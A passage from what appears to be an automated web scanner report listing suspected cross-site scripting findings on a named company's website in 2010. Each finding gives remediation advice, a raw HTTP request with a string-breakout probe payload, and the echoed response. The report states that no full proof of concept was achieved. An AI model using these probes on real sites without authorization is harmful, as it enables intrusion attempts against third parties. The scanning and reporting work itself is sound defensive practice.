Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nz70895"%3b894c67a9f8d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/nz70895";894c67a9f8d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.539. http://www.verizonbusiness.com/pa/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /pa/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7e84'%3b5f0a33a9f52 was submitted in the REST URL parameter 1. This input was echoed as b7e84';5f0a33a9f52 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pab7e84'%3b5f0a33a9f52/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:59:10 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47573
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:59:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:59:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/pab7e84';5f0a33a9f52/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.540. http://www.verizonbusiness.com/pa/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /pa/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73add"%3b61b1cc65595 was submitted in the REST URL parameter 1. This input was echoed as 73add";61b1cc65595 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pa73add"%3b61b1cc65595/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:40 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47573
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Esta p..gina no existe";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/pa73add";61b1cc65595/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.541. http://www.verizonbusiness.com/privacy/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /privacy/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f930"%3b4b2bf218c2 was submitted in the REST URL parameter 1. This input was echoed as 9f930";4b2bf218c2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy9f930"%3b4b2bf218c2/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40612
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/privacy9f930";4b2bf218c2/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.542. http://www.verizonbusiness.com/privacy/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /privacy/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd2da'%3bb6f82da7486 was submitted in the REST URL parameter 1. This input was echoed as dd2da';b6f82da7486 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacydd2da'%3bb6f82da7486/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:38 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40614
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/privacydd2da';b6f82da7486/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.543. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /products/itsolutions/caas/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fcd22'%3bee1b93201b8 was submitted in the REST URL parameter 1. This input was echoed as fcd22';ee1b93201b8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productsfcd22'%3bee1b93201b8/itsolutions/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response (redirected)

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:14 GMT
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Productsfcd22';ee1b93201b8/itsolutions/caas/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.544. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /products/itsolutions/caas/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23de6"%3bf40f6bc460e was submitted in the REST URL parameter 1. This input was echoed as 23de6";f40f6bc460e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products23de6"%3bf40f6bc460e/itsolutions/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response (redirected)

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:39:05 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products23de6";f40f6bc460e/itsolutions/caas/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.545. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /products/itsolutions/caas/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5960"%3b6a6a7da42f5 was submitted in the REST URL parameter 2. This input was echoed as f5960";6a6a7da42f5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/itsolutionsf5960"%3b6a6a7da42f5/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42299
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/itf5960";6a6a7da42f5/caas/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.546. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /products/itsolutions/caas/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9d72'%3ba0b4682ef0a was submitted in the REST URL parameter 2. This input was echoed as b9d72';a0b4682ef0a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/itsolutionsb9d72'%3ba0b4682ef0a/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42299
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/itb9d72';a0b4682ef0a/caas/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.547. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /products/itsolutions/caas/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be953'%3bfef5b8b9d7e was submitted in the REST URL parameter 3. This input was echoed as be953';fef5b8b9d7e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/itsolutions/caasbe953'%3bfef5b8b9d7e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:19 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43385
Date: Wed, 17 Nov 2010 00:40:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/cloud-it/caasbe953';fef5b8b9d7e/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.548. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /products/itsolutions/caas/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 471a3"%3baa7257f4871 was submitted in the REST URL parameter 3. This input was echoed as 471a3";aa7257f4871 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/itsolutions/caas471a3"%3baa7257f4871/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response (redirected)

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:08 GMT
Content-Type: text/html
Content-Length: 43387
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/cloud-it/caas471a3";aa7257f4871/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.549. http://www.verizonbusiness.com/pt/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /pt/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 765d2"%3be7f97da6fce was submitted in the REST URL parameter 1. This input was echoed as 765d2";e7f97da6fce in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pt765d2"%3be7f97da6fce/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/pt765d2";e7f97da6fce/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.550. http://www.verizonbusiness.com/pt/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /pt/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25def'%3b5568cd217f2 was submitted in the REST URL parameter 1. This input was echoed as 25def';5568cd217f2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pt25def'%3b5568cd217f2/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:45 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:45 GMT

